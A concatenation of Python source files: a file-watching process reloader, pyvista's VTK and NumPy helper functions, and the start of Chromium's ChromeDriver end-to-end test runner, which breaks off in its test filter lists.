more-self-documenting code. - Added considerable documentation about the operation of the reloader. """ from __future__ import ( absolute_import, print_function, unicode_literals, ) import abc import os import re import signal import subprocess import sys import threading import time import six USE_PY_INOTIFY = False try: # Test whether inotify is enabled and likely to work # noinspection PyPackageRequirements import pyinotify fd = pyinotify.INotifyWrapper.create().inotify_init() if fd >= 0: USE_PY_INOTIFY = True os.close(fd) except ImportError: pyinotify = None __all__ = ( 'get_reloader', ) NEED_RELOAD_EXIT_CODE = 3 def _clean_files(file_list): file_names = [] for file_name in file_list: if not file_name: continue if file_name.endswith('.pyc') or file_name.endswith('.pyo'): file_name = file_name[:-1] if file_name.endswith('$py.class'): file_name = file_name[:-9] + 'py' if os.path.exists(file_name): file_names.append(file_name) return file_names @six.add_metaclass(abc.ABCMeta) class AbstractReloader(object): """ This is the abstract base reloader, which handles most of the code associated with watching files for changes and reloading the application when changes are detected. All base classes must implement the logic for actually determining when changes happen to files (encapsulated within the abstract method `code_changed`). This base class does the following: - If this is the parent process, it starts a clone child process with the reloader enabled - If this is the parent process and the clone child process exits with exit code `NEED_RELOAD_EXIT_CODE`, it restarts the clone child process with the reloader enabled. If the child process exits with any other exit code, it exits with the same exit code. - If this is the child process, it starts a daemonic thread for watching files for changes and then executes the main program callable in the main thread. - The child process daemonic watching thread gets a list of files (possibly filtered by the `watch_modules` constructor parameter) that should be watched for changes and then watches them for changes. If changes occur, it signals the server process to shut down and then exits with exit code `NEED_RELOAD_EXIT_CODE` when it does. """ def __init__(self, main_module_name, watch_modules, signal_forks=False): """ Constructs a new abstract reloader. All subclasses must call `super(...).__init__(...)`. This sets up some important instance variables: - `main_module_name` from the constructor parameter - `watch_modules` is a compiled regular expression for matching module names based on the array from the constructor parameter, or `None` if `None` is passed in - `signal_forks` from the constructor parameter - `cached_modules` is a set of modules that have already been seen by `get_watch_file_names` - `cached_file_names` is a list of files that have already been seen by `get_cached_file_names` - `watching` is a flag to indicate whether the watcher is currently running; it is also used to tell the watcher to stop running. - `shutting_down_for_reload` is a flag that the watcher thread sets to tell the main thread that the server is shutting down due to file changes, so that the main thread knows to exit with exit code `NEED_RELOAD_EXIT_CODE`. See the documentation for `get_reloader` below for the meaning of the constructor parameters. """ self.main_module_name = main_module_name self.watch_modules = re.compile( r'^{}'.format('|'.join(watch_modules).replace('.', r'\.')) ) if watch_modules else None self.signal_forks = signal_forks self.cached_modules = set() self.cached_file_names = [] self.watching = False self.shutting_down_for_reload = False def get_watch_file_names(self, only_new=False): """ This determines which files we need to watch for changes. For starters, we only watch those modules that have been loaded as of startup. Furthermore, if `watch_modules` has been specified, we only watch loaded modules that match the name or names provided, or whose parents match the name or names provided. To be efficient, we cache the models and files initially looked at, and only look again if new modules have been loaded since we last looked. :param only_new: `True` means only return the file names that have not been returned on a previous call :return: A list of files that we need to watch """ self.cached_file_names = _clean_files(self.cached_file_names) module_values = set(sys.modules.values()) if self.cached_modules == module_values: if only_new: return [] else: return self.cached_file_names new_modules = module_values - self.cached_modules self.cached_modules = self.cached_modules.union(new_modules) if self.watch_modules: new_file_names = _clean_files( m.__file__ for m in new_modules if hasattr(m, '__file__') and self.watch_modules.match(m.__name__) ) else: new_file_names = _clean_files(m.__file__ for m in new_modules if hasattr(m, '__file__')) self.cached_file_names += new_file_names if only_new: return new_file_names else: return self.cached_file_names @abc.abstractmethod def code_changed(self): """ All subclasses must implement this. It should either block indefinitely until a file changes and then return `True`, or it should return `True` or `False` immediately to indicate whether files have changed since it was last called. :return: `True` or `False, has one or more files changed to require a reload """ raise NotImplementedError() def watch_files(self): """ Depending on the implementation, this loops or blocks indefinitely until the file watcher indicates code has changed, at which point it causes a process exit with the exit code `NEED_RELOAD_EXIT_CODE`. """ self.watching = True while self.watching: if self.code_changed(): # Signal the server process that we want it to stop (including its forks), and tell the reloader why self.shutting_down_for_reload = True os.kill(os.getpid(), signal.SIGTERM) if self.signal_forks: os.kill(os.getpid(), signal.SIGHUP) # The server should only take 5 seconds to shut down; if it takes longer, send it another signal i = 0 while self.watching: time.sleep(0.5) i += 1 if i > 12: print("Process took too long to stop after file change; signaling again (won't restart)") os.kill(os.getpid(), signal.SIGTERM) break break time.sleep(1) def stop_watching(self): """ This allows the main thread to signal the watcher thread that it should stop watching files. Subclasses may override this to perform additional stop-watching operations, but they must call `super(...).stop_watching()`. """ self.watching = False def restart_with_reloader(self): """ This starts a subprocess that is a clone of the current process, with all the same arguments, but with the `RUN_RELOADER_MAIN` environment variable added to the subprocess's environment. It blocks until that subprocess exits, and then examines its exit code. If the exit code is `NEED_RELOAD_EXIT_CODE`, this means the file watcher indicated files have changed and need to be reloaded and exited, so this loops and starts the process again. :return: The code with which the clone subprocess exited if not `NEED_RELOAD_EXIT_CODE`. """ command = [sys.executable] + ['-W{}'.format(o) for o in sys.warnoptions] if self.main_module_name and '{}.py'.format(self.main_module_name.replace('.', '/')) in sys.argv[0]: # The server was started with `python -m some_module`, so sys.argv is "wrong." Fix it. command += ['-m', self.main_module_name] command += sys.argv[1:] else: # The server was started with /path/to/file.py, so sys.argv is "right." command += sys.argv new_environment = os.environ.copy() new_environment['RUN_RELOADER_MAIN'] = 'true' while True: # We don't want these signals to actually kill this process; just sub-processes signal.signal(signal.SIGINT, signal.SIG_IGN) signal.signal(signal.SIGTERM, signal.SIG_IGN) exit_code = subprocess.call(command, env=new_environment) if exit_code != NEED_RELOAD_EXIT_CODE: return exit_code def watch_and_reload(self, func, args, kwargs): """ This is what gets the watching process started. In order to monitor for changes and control process restarts, we actually need to start the entire server process from the watcher. But the server process has already started. So, if this is the original server process (environment variable `RUN_RELOADER_MAIN` is not set), we call `restart_with_reloader` to actually start the server process again with files watched. If this is the restarted server process (environment variable `RUN_RELOADER_MAIN` _is_ set), then we start the reloading loop. The original started process does not die. It continues running until `restart_with_reloader` returns, which doesn't happen until the restarted (child) server process exits with a code other than `NEED_RELOAD_EXIT_CODE`. :param func: The main program execution function, usually something like ExampleServer.main :param args: The positional arguments that should be passed to the main program execution function :param kwargs: The keyword arguments that should be passed to the main program execution function """ if os.environ.get('RUN_RELOADER_MAIN') == 'true': thread = threading.Thread(target=self.watch_files) thread.daemon = True # we don't want this thread to stop the program from exiting thread.start() try: func(*args, **kwargs) except KeyboardInterrupt: pass except BaseException: self.stop_watching() raise self.stop_watching() if self.shutting_down_for_reload: sys.exit(NEED_RELOAD_EXIT_CODE) # server process shut down because the reloader asked it to else: sys.exit(0) # server process terminated naturally else: try: exit_code = self.restart_with_reloader() if exit_code < 0: # Python docs say: A negative exit code -N indicates that the child was terminated by signal N. os.kill(os.getpid(), -exit_code) else: sys.exit(exit_code) except KeyboardInterrupt: pass def main(self, func, args=None, kwargs=None): """ This is the method that all consumers of the reloader should call. Pass it the main program execution function, along with the args and kwargs that should be passed to the main program execution function, and it will supervise the execution of the main program function and watch for file changes. It will then restart the process if any file changes occur. See the documentation for the other methods to understand how this work in more detail. :param func: The main program execution function, usually something like ExampleServer.main :param args: The positional arguments that should be passed to the main program execution function :param kwargs: The keyword arguments that should be passed to the main program execution function """ if args is None: args = () if kwargs is None: kwargs = {} self.watch_and_reload(func, args, kwargs) class _PyInotifyReloader(AbstractReloader): """ This concrete class completes the reloader by using the PyInotify API. It is only supported on Linux operating systems with kernel version >= 2.6.13. """ def __init__(self, main_module_name, watch_modules, signal_forks=False): self.notifier = None super(_PyInotifyReloader, self).__init__(main_module_name, watch_modules, signal_forks) def code_changed(self): notify_mask = ( pyinotify.IN_MODIFY | pyinotify.IN_DELETE | pyinotify.IN_ATTRIB | pyinotify.IN_MOVED_FROM | pyinotify.IN_MOVED_TO | pyinotify.IN_CREATE | pyinotify.IN_DELETE_SELF | pyinotify.IN_MOVE_SELF ) class EventHandler(pyinotify.ProcessEvent): def process_default(self, event): pass watch_manager = pyinotify.WatchManager() self.notifier = pyinotify.Notifier(watch_manager, EventHandler()) file_names = self.get_watch_file_names(only_new=True) for file_name in file_names: watch_manager.add_watch(file_name, notify_mask) self.notifier.check_events(timeout=None) if self.watching: self.notifier.read_events() self.notifier.process_events() self.notifier.stop() self.notifier = None # If we are here, then one or more files must have changed return True return False def stop_watching(self): if self.watching: # The first time this is called, stop the notifier super(_PyInotifyReloader, self).stop_watching() if self.notifier: self.notifier.stop() self.notifier = None else: super(_PyInotifyReloader, self).stop_watching() class _PollingReloader(AbstractReloader): """ This concrete class completes the reloader by polling the last-modified time stat for every file being watched. It is not as fast as the PyInotify reloader in large applications, but it is supported on all operating systems. """ is_windows = sys.platform == 'win32' def __init__(self, main_module_name, watch_modules, signal_forks=False): self.modified_times = {} super(_PollingReloader, self).__init__(main_module_name, watch_modules, signal_forks) def code_changed(self): file_names = self.get_watch_file_names() for file_name in file_names: stat = os.stat(file_name) modified_time = stat.st_mtime if self.is_windows: modified_time -= stat.st_ctime if file_name not in self.modified_times: self.modified_times[file_name] = modified_time continue if modified_time != self.modified_times[file_name]: self.modified_times = {} return True return False def get_reloader(main_module_name, watch_modules, signal_forks=False): """ Don't instantiate a reloader directly. Instead, call this method to get a reloader, and then call `main` on that reloader. See the documentation for `AbstractReloader.main` above to see how to call it. :param main_module_name: The main module name (such as "example_service.standalone"). It should be the value that was passed to the `-m` parameter when starting the Python executable, or `None` if the `-m` parameter was not used. :param watch_modules: If passed an iterable/generator of module names, file watching will be limited to modules whose names start with one of these names (including their submodules). For example, if passed `['example', 'pysoa']`, it will monitor all of PySOA's modules and submodules and all of `example_service`'s modules and submodules, as well as any other modules that start with `example`. If `None`, all files from all modules in all libraries, including Python, will be watched. :param signal_forks: If `True`, this means the server process is actually multiprocessing/forking and its child processes are the actual server processes. In this case, the file watcher also sends `SIGHUP` in addition to `SIGTERM` to the clone process, and the clone process receives this and knows to send `SIGTERM` to all of its forked child processes. :return: a new reloader instance. """ if USE_PY_INOTIFY: return _PyInotifyReloader(main_module_name, watch_modules, signal_forks) return _PollingReloader(main_module_name, watch_modules, signal_forks)
helpers.py
"""Supporting functions for polydata and grid objects.""" import signal import collections import ctypes import enum import logging import warnings from threading import Thread import numpy as np import scooby import vtk import vtk.util.numpy_support as nps import pyvista from .fileio import from_meshio class FieldAssociation(enum.Enum): """Represents which type of vtk field a scalar or vector array is associated with.""" POINT = vtk.vtkDataObject.FIELD_ASSOCIATION_POINTS CELL = vtk.vtkDataObject.FIELD_ASSOCIATION_CELLS NONE = vtk.vtkDataObject.FIELD_ASSOCIATION_NONE ROW = vtk.vtkDataObject.FIELD_ASSOCIATION_ROWS def get_vtk_type(typ): """Look up the VTK type for a give python data type. Corrects for string type mapping issues. Return ------ int : the integer type id specified in vtkType.h """ typ = nps.get_vtk_array_type(typ) # This handles a silly string type bug if typ == 3: return 13 return typ def vtk_bit_array_to_char(vtkarr_bint): """Cast vtk bit array to a char array.""" vtkarr = vtk.vtkCharArray() vtkarr.DeepCopy(vtkarr_bint) return vtkarr def vtk_id_list_to_array(vtk_id_list): """Convert a vtkIdList to a NumPy array.""" return np.array([vtk_id_list.GetId(i) for i in range(vtk_id_list.GetNumberOfIds())]) def convert_string_array(arr, name=None): """Convert a numpy array of strings to a vtkStringArray or vice versa. Note that this is terribly inefficient - inefficient support is better than no support :). If you have ideas on how to make this faster, please consider opening a pull request. """ if isinstance(arr, np.ndarray): vtkarr = vtk.vtkStringArray() ########### OPTIMIZE ########### for val in arr: vtkarr.InsertNextValue(val) ################################ if isinstance(name, str): vtkarr.SetName(name) return vtkarr # Otherwise it is a vtk array and needs to be converted back to numpy carr = np.empty(arr.GetNumberOfValues(), dtype='O') ############### OPTIMIZE ############### for i in range(arr.GetNumberOfValues()): carr[i] = arr.GetValue(i) ######################################## return carr.astype('|S') def convert_array(arr, name=None, deep=0, array_type=None): """Convert a NumPy array to a vtkDataArray or vice versa. Parameters ----------- arr : ndarray or vtkDataArry A numpy array or vtkDataArry to convert name : str The name of the data array for VTK deep : bool if input is numpy array then deep copy values Return ------ vtkDataArray, ndarray, or DataFrame: the converted array (if input is a NumPy ndaray then returns ``vtkDataArray`` or is input is ``vtkDataArray`` then returns NumPy ``ndarray``). If pdf==True and the input is ``vtkDataArry``, return a pandas DataFrame. """ if arr is None: return if isinstance(arr, np.ndarray): if arr.dtype is np.dtype('O'): arr = arr.astype('|S') arr = np.ascontiguousarray(arr) try: # This will handle numerical data arr = np.ascontiguousarray(arr) vtk_data = nps.numpy_to_vtk(num_array=arr, deep=deep, array_type=array_type) except ValueError: # This handles strings typ = get_vtk_type(arr.dtype) if typ == 13: vtk_data = convert_string_array(arr) if isinstance(name, str): vtk_data.SetName(name) return vtk_data # Otherwise input must be a vtkDataArray if not isinstance(arr, (vtk.vtkDataArray, vtk.vtkBitArray, vtk.vtkStringArray)): raise TypeError('Invalid input array type ({}).'.format(type(arr))) # Handle booleans if isinstance(arr, vtk.vtkBitArray): arr = vtk_bit_array_to_char(arr) # Handle string arrays if isinstance(arr, vtk.vtkStringArray): return convert_string_array(arr) # Convert from vtkDataArry to NumPy return nps.vtk_to_numpy(arr) def is_pyvista_dataset(obj): """Return True if the Object is a PyVista wrapped dataset.""" return isinstance(obj, (pyvista.Common, pyvista.MultiBlock)) def point_array(mesh, name): """Return point array of a vtk object.""" vtkarr = mesh.GetPointData().GetAbstractArray(name) return convert_array(vtkarr) def point_scalar(mesh, name): """Return point array of a vtk object. DEPRECATED: please use `point_array` instead. """ warnings.warn("DEPRECATED: please use `point_array` instead.") return point_array(mesh, name) def field_array(mesh, name): """Return field array of a vtk object.""" vtkarr = mesh.GetFieldData().GetAbstractArray(name) return convert_array(vtkarr) def field_scalar(mesh, name): """Return field array of a vtk object. DEPRECATED: please use `field_array` instead. """ warnings.warn("DEPRECATED: please use `field_array` instead.") return field_array(mesh, name) def cell_array(mesh, name): """Return cell array of a vtk object.""" vtkarr = mesh.GetCellData().GetAbstractArray(name) return convert_array(vtkarr) def cell_scalar(mesh, name): """Return cell array of a vtk object. DEPRECATED: please use `cell_array` instead. """ warnings.warn("DEPRECATED: please use `cell_array` instead.") return cell_array(mesh, name) def row_array(data_object, name): """Return row array of a vtk object.""" vtkarr = data_object.GetRowData().GetAbstractArray(name) return convert_array(vtkarr) def parse_field_choice(field): """Return the id of the given field.""" if isinstance(field, str): field = field.strip().lower() if field in ['cell', 'c', 'cells']: field = FieldAssociation.CELL elif field in ['point', 'p', 'points']: field = FieldAssociation.POINT elif field in ['field', 'f', 'fields']: field = FieldAssociation.NONE elif field in ['row', 'r',]: field = FieldAssociation.ROW else: raise RuntimeError('Data field ({}) not supported.'.format(field)) elif isinstance(field, FieldAssociation): pass else: raise RuntimeError('Data field ({}) not supported.'.format(field)) return field def get_array(mesh, name, preference='cell', info=False, err=False): """Search point, cell and field data for an array. Parameters ---------- name : str The name of the array to get the range. preference : str, optional When scalars is specified, this is the preferred array type to search for in the dataset. Must be either ``'point'``, ``'cell'``, or ``'field'`` info : bool Return info about the array rather than the array itself. err : bool Boolean to control whether to throw an error if array is not present. """ if isinstance(mesh, vtk.vtkTable): arr = row_array(mesh, name) if arr is None and err: raise KeyError('Data array ({}) not present in this dataset.'.format(name)) field = FieldAssociation.ROW if info: return arr, field return arr parr = point_array(mesh, name) carr = cell_array(mesh, name) farr = field_array(mesh, name) preference = parse_field_choice(preference) if np.sum([parr is not None, carr is not None, farr is not None]) > 1: if preference == FieldAssociation.CELL: if info: return carr, FieldAssociation.CELL else: return carr elif preference == FieldAssociation.POINT: if info: return parr, FieldAssociation.POINT else: return parr elif preference == FieldAssociation.NONE: if info: return farr, FieldAssociation.NONE else: return farr else: raise RuntimeError('Data field ({}) not supported.'.format(preference)) arr = None field = None if parr is not None: arr = parr field = FieldAssociation.POINT elif carr is not None: arr = carr field = FieldAssociation.CELL elif farr is not None: arr = farr field = FieldAssociation.NONE elif err: raise KeyError('Data array ({}) not present in this dataset.'.format(name)) if info: return arr, field return arr def vtk_points(points, deep=True): """Convert numpy points to a vtkPoints object.""" if not points.flags['C_CONTIGUOUS']: points = np.ascontiguousarray(points) vtkpts = vtk.vtkPoints() vtkpts.SetData(nps.numpy_to_vtk(points, deep=deep)) return vtkpts def line_segments_from_points(points): """Generate non-connected line segments from points. Assumes points are ordered as line segments and an even number of points are Parameters ---------- points : np.ndarray Points representing line segments. An even number must be given as every two vertices represent a single line segment. For example, two line segments would be represented as: np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]]) Returns ------- lines : pyvista.PolyData PolyData with lines and cells. Examples -------- This example plots two line segments at right angles to each other line. >>> import pyvista >>> import numpy as np >>> points = np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]]) >>> lines = pyvista.lines_from_points(points) >>> lines.plot() # doctest:+SKIP """ if len(points) % 2: raise RuntimeError("An even number of points must be given to define each segment.") # Assuming ordered points, create array defining line order n_points = len(points) n_lines = n_points // 2 lines = np.c_[(2 * np.ones(n_lines, np.int), np.arange(0, n_points-1, step=2), np.arange(1, n_points+1, step=2))] poly = pyvista.PolyData() poly.points = points poly.lines = lines return poly def lines_from_points(points, close=False): """Make a connected line set given an array of points. Parameters ---------- points : np.ndarray Points representing the vertices of the connected segments. For example, two line segments would be represented as: np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0]]) close : bool, optional If True, close the line segments into a loop Return ------ lines : pyvista.PolyData PolyData with lines and cells. """ poly = pyvista.PolyData() poly.points = points cells = np.full((len(points)-1, 3), 2, dtype=np.int) cells[:, 1] = np.arange(0, len(points)-1, dtype=np.int) cells[:, 2] = np.arange(1, len(points), dtype=np.int) if close: cells = np.append(cells, [[2, len(points)-1, 0],], axis=0) poly.lines = cells return poly def vector_poly_data(orig, vec): """Create a vtkPolyData object composed of vectors.""" # shape, dimension checking if not isinstance(orig, np.ndarray): orig = np.asarray(orig) if not isinstance(vec, np.ndarray): vec = np.asarray(vec) if orig.ndim != 2: orig = orig.reshape((-1, 3)) elif orig.shape[1] != 3: raise Exception('orig array must be 3D') if vec.ndim != 2: vec = vec.reshape((-1, 3)) elif vec.shape[1] != 3: raise Exception('vec array must be 3D') # Create vtk points and cells objects vpts = vtk.vtkPoints() vpts.SetData(nps.numpy_to_vtk(np.ascontiguousarray(orig), deep=True)) npts = orig.shape[0] cells = np.hstack((np.ones((npts, 1), 'int'), np.arange(npts).reshape((-1, 1)))) if cells.dtype != ctypes.c_int64 or cells.flags.c_contiguous: cells = np.ascontiguousarray(cells, ctypes.c_int64) cells = np.reshape(cells, (2*npts)) vcells = vtk.vtkCellArray() vcells.SetCells(npts, nps.numpy_to_vtkIdTypeArray(cells, deep=True)) # Create vtkPolyData object pdata = vtk.vtkPolyData() pdata.SetPoints(vpts) pdata.SetVerts(vcells) # Add vectors to polydata name = 'vectors' vtkfloat = nps.numpy_to_vtk(np.ascontiguousarray(vec), deep=True) vtkfloat.SetName(name) pdata.GetPointData().AddArray(vtkfloat) pdata.GetPointData().SetActiveVectors(name) # Add magnitude of vectors to polydata name = 'mag' scalars = (vec * vec).sum(1)**0.5 vtkfloat = nps.numpy_to_vtk(np.ascontiguousarray(scalars), deep=True) vtkfloat.SetName(name) pdata.GetPointData().AddArray(vtkfloat) pdata.GetPointData().SetActiveScalars(name) return pyvista.PolyData(pdata) def trans_from_matrix(matrix): """Convert a vtk matrix to a numpy.ndarray.""" t = np.zeros((4, 4)) for i in range(4): for j in range(4): t[i, j] = matrix.GetElement(i, j) return t def is_meshio_mesh(mesh): """Test if passed object is instance of ``meshio.Mesh``.""" try: import meshio return isinstance(mesh, meshio.Mesh) except ImportError: return False def wrap(vtkdataset): """Wrap any given VTK data object to its appropriate PyVista data object. Other formats that are supported include: * 2D :class:`numpy.ndarray` of XYZ vertices * 3D :class:`numpy.ndarray` representing a volume. Values will be scalars. """ wrappers = { 'vtkUnstructuredGrid': pyvista.UnstructuredGrid, 'vtkRectilinearGrid': pyvista.RectilinearGrid, 'vtkStructuredGrid': pyvista.StructuredGrid, 'vtkPolyData': pyvista.PolyData, 'vtkImageData': pyvista.UniformGrid, 'vtkStructuredPoints': pyvista.UniformGrid, 'vtkMultiBlockDataSet': pyvista.MultiBlock, 'vtkTable': pyvista.Table, # 'vtkParametricSpline': pyvista.Spline, } # Otherwise, we assume a VTK data object was passed if hasattr(vtkdataset, 'GetClassName'): key = vtkdataset.GetClassName() elif vtkdataset is None: return None elif isinstance(vtkdataset, np.ndarray): if vtkdataset.ndim == 1 and vtkdataset.shape[0] == 3: return pyvista.PolyData(vtkdataset) if vtkdataset.ndim > 1 and vtkdataset.ndim < 3 and vtkdataset.shape[1] == 3: return pyvista.PolyData(vtkdataset) elif vtkdataset.ndim == 3: mesh = pyvista.UniformGrid(vtkdataset.shape) mesh['values'] = vtkdataset.ravel(order='F') mesh.active_scalars_name = 'values' return mesh else: print(vtkdataset.shape, vtkdataset) raise NotImplementedError('NumPy array could not be converted to PyVista.') elif is_meshio_mesh(vtkdataset): return from_meshio(vtkdataset) else: raise NotImplementedError('Type ({}) not able to be wrapped into a PyVista mesh.'.format(type(vtkdataset))) try: wrapped = wrappers[key](vtkdataset) except KeyError: logging.warning('VTK data type ({}) is not currently supported by pyvista.'.format(key)) return vtkdataset # if not supported just passes the VTK data object return wrapped def image_to_texture(image): """Convert ``vtkImageData`` (:class:`pyvista.UniformGrid`) to a ``vtkTexture``.""" return pyvista.Texture(image) def numpy_to_texture(image): """Convert a NumPy image array to a vtk.vtkTexture.""" if not isinstance(image, np.ndarray): raise TypeError('Unknown input type ({})'.format(type(image))) return pyvista.Texture(image) def is_inside_bounds(point, bounds): """Check if a point is inside a set of bounds. This is implemented through recursion so that this is N-dimensional. """ if isinstance(point, (int, float)): point = [point] if isinstance(point, collections.Iterable) and not isinstance(point, collections.deque): if len(bounds) < 2 * len(point) or len(bounds) % 2 != 0: raise AssertionError('Bounds mismatch point dimensionality') point = collections.deque(point) bounds = collections.deque(bounds) return is_inside_bounds(point, bounds) if not isinstance(point, collections.deque): raise TypeError('Unknown input data type ({}).'.format(type(point))) if len(point) < 1: return True p = point.popleft() lower, upper = bounds.popleft(), bounds.popleft() if lower <= p <= upper: return is_inside_bounds(point, bounds) return False def fit_plane_to_points(points, return_meta=False): """Fit a plane to a set of points. Parameters ---------- points : np.ndarray Size n by 3 array of points to fit a plane through return_meta : bool If true, also returns the center and normal used to generate the plane """ data = np.array(points) center = data.mean(axis=0) result = np.linalg.svd(data - center) normal = np.cross(result[2][0], result[2][1]) plane = pyvista.Plane(center=center, direction=normal) if return_meta: return plane, center, normal return plane def raise_not_matching(scalars, mesh): """Raise exception about inconsistencies.""" if isinstance(mesh, vtk.vtkTable): raise Exception('Number of scalars ({})'.format(scalars.size) + 'must match number of rows ' + '({}).'.format(mesh.n_rows) ) raise Exception('Number of scalars ({}) '.format(scalars.size) + 'must match either the number of points ' + '({}) '.format(mesh.n_points) + 'or the number of cells ' + '({}). '.format(mesh.n_cells) ) def generate_plane(normal, origin): """Return a vtk.vtkPlane.""" plane = vtk.vtkPlane() # NORMAL MUST HAVE MAGNITUDE OF 1 normal = normal / np.linalg.norm(normal) plane.SetNormal(normal) plane.SetOrigin(origin) return plane def generate_report(additional=None, ncol=3, text_width=54, sort=False): """Generate a report. DEPRECATED: Please use :class:`pyvista.Report` instead. """ logging.warning('DEPRECATED: Please use `pyvista.Report` instead.') core = ['pyvista', 'vtk', 'numpy', 'imageio', 'appdirs', 'scooby'] optional = ['matplotlib', 'PyQt5', 'IPython', 'colorcet', 'cmocean'] report = scooby.Report(core=core, optional=optional, additional=additional, ncol=ncol, text_width=text_width, sort=sort) return report def try_callback(func, *args): """Wrap a given callback in a try statement.""" try: func(*args) except Exception as e: logging.warning('Encountered issue in callback: {}'.format(e)) return def check_depth_peeling(number_of_peels=100, occlusion_ratio=0.0): """Check if depth peeling is available. Attempts to use depth peeling to see if it is available for the current environment. Returns ``True`` if depth peeling is available and has been successfully leveraged, otherwise ``False``. """ # Try Depth Peeling with a basic scene source = vtk.vtkSphereSource() mapper = vtk.vtkPolyDataMapper() mapper.SetInputConnection(source.GetOutputPort()) actor = vtk.vtkActor() actor.SetMapper(mapper) # requires opacity < 1 actor.GetProperty().SetOpacity(0.5) renderer = vtk.vtkRenderer() renderWindow = vtk.vtkRenderWindow() renderWindow.AddRenderer(renderer) renderWindow.SetOffScreenRendering(True) renderWindow.SetAlphaBitPlanes(True) renderWindow.SetMultiSamples(0) renderer.AddActor(actor) renderer.SetUseDepthPeeling(True) renderer.SetMaximumNumberOfPeels(number_of_peels) renderer.SetOcclusionRatio(occlusion_ratio) renderWindow.Render() return renderer.GetLastRenderingUsedDepthPeeling() == 1 def threaded(fn): """Call a function using a thread.""" def wrapper(*args, **kwargs): thread = Thread(target=fn, args=args, kwargs=kwargs) thread.start() return thread return wrapper class conditional_decorator(object): """Conditional decorator for methods.""" def __init__(self, dec, condition): """Initialize.""" self.decorator = dec self.condition = condition def __call__(self, func): """Call the decorated function if condition is matched.""" if not self.condition: # Return the function unchanged, not decorated. return func return self.decorator(func) class ProgressMonitor(): """A standard class for monitoring the progress of a VTK algorithm. This must be use in a ``with`` context and it will block keyboard interrupts from happening until the exit event as interrupts will crash the kernel if the VTK algorithm is still executing. """ def __init__(self, algorithm, message="", scaling=100): """Initialize observer.""" try: from tqdm import tqdm except ImportError: raise ImportError("Please install `tqdm` to monitor algorithms.") self.event_type = vtk.vtkCommand.ProgressEvent self.progress = 0.0 self._last_progress = self.progress self.algorithm = algorithm self.message = message self._interrupt_signal_received = False self._old_progress = 0 self._old_handler = None self._progress_bar = None def handler(self, sig, frame): """Pass signal to custom interrupt handler.""" self._interrupt_signal_received = (sig, frame) logging.debug('SIGINT received. Delaying KeyboardInterrupt until ' 'VTK algorithm finishes.') def __call__(self, obj, event, *args): """Call progress update callback. On an event occurrence, this function executes. """ if self._interrupt_signal_received: obj.AbortExecuteOn() else: progress = obj.GetProgress() step = progress - self._old_progress self._progress_bar.update(step) self._old_progress = progress def __enter__(self): """Enter event for ``with`` context.""" from tqdm import tqdm self._old_handler = signal.signal(signal.SIGINT, self.handler) self._progress_bar = tqdm(total=1, leave=True, bar_format='{l_bar}{bar}[{elapsed}<{remaining}]') self._progress_bar.set_description(self.message) self.algorithm.AddObserver(self.event_type, self) return self._progress_bar def __exit__(self, type, value, traceback): """Exit event for ``with`` context.""" self._progress_bar.total = 1 self._progress_bar.refresh() self._progress_bar.close() self.algorithm.RemoveObservers(self.event_type) signal.signal(signal.SIGINT, self._old_handler)
run_py_tests.py
#!/usr/bin/env python # Copyright 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """End to end tests for ChromeDriver.""" # Note that to run Android tests you must have the following line in # .gclient (in the parent directory of src): target_os = [ 'android' ] # to get the appropriate adb version for ChromeDriver. # TODO (crbug.com/857239): Remove above comment when adb version # is updated in Devil. import base64 import json import math import optparse import os import re import shutil import socket import subprocess import sys import tempfile import threading import time import unittest import urllib import urllib2 import uuid import imghdr import struct _THIS_DIR = os.path.abspath(os.path.dirname(__file__)) _PARENT_DIR = os.path.join(_THIS_DIR, os.pardir) _CLIENT_DIR = os.path.join(_PARENT_DIR, "client") _SERVER_DIR = os.path.join(_PARENT_DIR, "server") _TEST_DIR = os.path.join(_PARENT_DIR, "test") sys.path.insert(1, _PARENT_DIR) import chrome_paths import util sys.path.remove(_PARENT_DIR) sys.path.insert(1, _CLIENT_DIR) import chromedriver import websocket_connection import webelement sys.path.remove(_CLIENT_DIR) sys.path.insert(1, _SERVER_DIR) import server sys.path.remove(_SERVER_DIR) sys.path.insert(1, _TEST_DIR) import unittest_util import webserver sys.path.remove(_TEST_DIR) sys.path.insert(0,os.path.join(chrome_paths.GetSrc(), 'third_party', 'catapult', 'third_party', 'gsutil', 'third_party', 'monotonic')) from monotonic import monotonic _TEST_DATA_DIR = os.path.join(chrome_paths.GetTestData(), 'chromedriver') if util.IsLinux(): sys.path.insert(0, os.path.join(chrome_paths.GetSrc(), 'third_party', 'catapult', 'devil')) from devil.android import device_utils from devil.android import forwarder sys.path.insert(0, os.path.join(chrome_paths.GetSrc(), 'build', 'android')) import devil_chromium from pylib import constants _NEGATIVE_FILTER = [ # This test is too flaky on the bots, but seems to run perfectly fine # on developer workstations. 'ChromeDriverTest.testEmulateNetworkConditionsNameSpeed', 'ChromeDriverTest.testEmulateNetworkConditionsSpeed', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=833 'ChromeDriverTest.testAlertOnNewWindow', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2532 'ChromeDriverPageLoadTimeoutTest.testRefreshWithPageLoadTimeout', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=3517 'ChromeDriverTest.testPrint', 'ChromeDriverTest.testPrintInvalidArgument', ] _OS_SPECIFIC_FILTER = {} _OS_SPECIFIC_FILTER['win'] = [ # https://bugs.chromium.org/p/chromedriver/issues/detail?id=299 'ChromeLogPathCapabilityTest.testChromeLogPath', ] _OS_SPECIFIC_FILTER['linux'] = [ ] _OS_SPECIFIC_FILTER['mac'] = [ # https://bugs.chromium.org/p/chromedriver/issues/detail?id=1927 # https://crbug.com/1036636 'MobileEmulationCapabilityTest.testTapElement', # https://bugs.chromium.org/p/chromium/issues/detail?id=1011225 'ChromeDriverTest.testActionsMultiTouchPoint', # Flaky: https://crbug.com/1156576. 'ChromeDriverTestLegacy.testContextMenuEventFired', # Flaky: https://crbug.com/1157533. 'ChromeDriverTest.testShadowDomFindElement', ] _DESKTOP_NEGATIVE_FILTER = [ # Desktop doesn't support touch (without --touch-events). 'ChromeDriverTestLegacy.testTouchSingleTapElement', 'ChromeDriverTest.testTouchDownMoveUpElement', 'ChromeDriverTestLegacy.testTouchScrollElement', 'ChromeDriverTestLegacy.testTouchDoubleTapElement', 